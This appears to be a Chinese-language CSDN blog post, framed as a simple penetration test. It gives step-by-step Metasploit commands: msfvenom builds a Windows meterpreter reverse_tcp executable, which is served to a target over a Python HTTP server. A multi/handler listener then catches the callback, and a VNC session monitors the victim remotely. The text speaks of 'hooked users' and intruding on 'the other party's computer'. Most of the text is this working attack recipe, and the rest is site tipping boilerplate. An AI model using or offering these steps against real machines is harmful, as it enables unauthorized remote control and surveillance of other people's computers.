一次简单的渗透测试

该文介绍了如何在KaliLinux环境下,使用msfvenom生成针对Windows10IoT企业版的恶意可执行文件,通过本地http服务器将其传输到靶机,然后利用msfconsole设置exploit模块,监听并控制靶机,最后通过运行test.exe实现meterpreter会话,以进行远程监控。
摘要由CSDN通过智能技术生成

一、环境

kali2022.4,靶机环境win10物联网企业版,工具:msfvenom、msfconsole、python3

二、具体步骤

1、管理员权限打开终端

2、生成可执行文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=指定端口 -f exe -o test.exe

3、在目标靶机下载生成的test.exe程序

1)在kali执行python3 -m http.server

2)在目标靶机进行下载

4、执行msfconsole命令

5、配置参数

use exploit/multi/handler(选择模块)

set payload windows/meterpreter/reverse_tcp(选择攻击模块)

set LhOST 本地ip

set lport 指定端口号

show options(查看配置的参数)

exploit -z -j(后台执行)

6、在靶机运行可执行程序test.exe

7、执行sessions查看上钩的用户

8、执行sessions -i 1进行攻击,出现meterpreter说明你就已经成功的入侵的对方的电脑

9、运行run vnc -i进行远程监控靶机

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

古道青阳

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值